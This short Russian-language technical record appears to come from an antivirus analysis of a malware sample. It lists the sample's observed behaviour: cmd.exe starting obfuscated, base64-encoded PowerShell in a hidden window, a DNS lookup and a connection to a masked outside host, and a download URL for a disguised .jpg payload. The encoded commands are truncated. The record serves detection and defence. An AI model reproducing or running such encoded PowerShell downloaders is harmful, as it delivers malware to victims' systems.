Техническая информация
- '<SYSTEM32>\cmd.exe' & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAATgBiAEQAQQAzAFQANwBjAEUAegBHAEoAQQBMADEAegBzAHEAQQBhADgAcQB3ACAAKAAgACQARAB5AGgARQBKAGMAUAA4AGcATgA4AEYAOQBGAGQAVwBSACAALAAgACQARwBiAFAAdAB3AEkAQQBjA...
- 'oc###.igg.biz':80
- http://oc###.igg.biz/01/OssRDER.jpg
- DNS ASK oc###.igg.biz
- '<SYSTEM32>\cmd.exe' & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAATgBiAEQAQQAzAFQANwBjAEUAegBHAEoAQQBMADEAegBzAHEAQQBhADgAcQB3ACAAKAAgACQARAB5AGgARQBKAGMAUAA4AGcATgA4AEYAOQBGAGQAVwBSACAALAAgACQARwBiAFAAdAB3AEkAQQBjA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -En ZgB1AG4AYwB0AGkAbwBuACAATgBiAEQAQQAzAFQANwBjAEUAegBHAEoAQQBMADEAegBzAHEAQQBhADgAcQB3ACAAKAAgACQARAB5AGgARQBKAGMAUAA4AGcATgA4AEYAOQBGAGQAVwBSACAALAAgACQARwBiAFAAdAB3AEkAQQBjADUAaQBWAGwAMgBRA...